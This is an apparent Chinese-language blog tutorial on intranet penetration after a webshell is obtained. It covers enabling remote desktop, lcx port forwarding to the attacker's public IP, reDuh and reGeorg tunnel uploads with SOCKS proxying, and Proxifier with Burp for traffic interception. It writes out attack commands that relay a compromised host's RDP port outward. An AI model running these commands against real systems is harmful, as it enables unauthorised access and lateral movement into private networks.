淺析內網滲透
關於內網滲透其實方法和思路以及要注意的點內容非常多,又是一個大坑,我就暫且先從三個情況下分別整理一種方法,大概瞭解一下,先挖個坑哈,手裏還有資料但太亂了,之後我再整理吧(真的很多,不是我偷懶,看的眼都暈了,感覺就是一套全新的滲透測試那麼多)
前瞻
先回看一下之前的幾個小思路吧
Webshell如何開啓3389服務
1、通過修改註冊表開啓遠程終端,詳情請看: http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html
2、通過3389工具開啓遠程終端
3、數據庫可以開
4、上傳exe可以開
服務器端口被修改如何查找
註冊表讀取、
端口掃描、
命令探針查找修改後的端口
外到內滲透連接
拿到webshell,服務器處於內網(沒有公網地址)的情況下如何遠程連接
1、通過lcx工具解決內網遠程連接
把lcx傳到遠程服務器去
原理就是把目標機端口轉發到自己公網IP的端口
Webshell上執行:lcx.exe -slave
自己的公網ip 2222 127.0.0.1 3389
將本機3389端口流量轉發到公網ip的2222端口上去
自己的電腦裏面執行:lcx.exe -listen 2222 4444
監聽本地的2222端口將流量轉發到4444
然後連接127.0.0.1 4444
缺陷
可能在公司裏實際滲透測試過程中,你是在內網中的,同時你無法操控路由器,沒有公網地址
解決就通過下面講的服務器處於內網遠程連接
內到內滲透連接
兩臺電腦分別在各自的內網怎麼連接
通過端口轉發腳本解決內網遠程連接
通過reDUH
選擇對應語言的文件上傳
訪問一下
通過設置,將本地3389映射到1234上
訪問127.0.0.1 1234
內網滲透測試
在上面我們講到的都是單端口轉發,那麼如何擴大戰果,得到與目標機同一公網下的其他主機的權限呢
環境準備
兩臺虛擬機
兩個網卡
一個處於lan區段1
另一個nat模式映射到公網
方法:需要兩個工具結合
reGeorg
把tunnel.php傳到服務器
本地執行cmd
reGeorg-master\reGeorgSocksProxy.py -p 9999 -u http://192.168.0.102:8080/tunnel.nosocket.php
讓內網之間構成一個通道
Proxifier
代理工具裝在本機
設置地址127.0.0.1端口跟上面對應
協議選擇
socks協議
各種協議都支持
https協議
web
配置代理規則
本地所有數據包都走socks
通過它轉發本地所有流量
補充
關於burp+Proxifier結合抓包
有很多APP現在是防代理的或者黑名單防禦,比如微信
但是抓包中間加一個環節使用這個軟件 就可以應對了
因爲socks是很正規的
方法
在電腦上裝模擬器
把burp ca證書丟在模擬器里加載
設置規則 新建規則 讓模擬器這個進程所有數據包走socks就可以了
注意 結合使用的工具不要進行攔截 要選擇direct模式
訪問驗證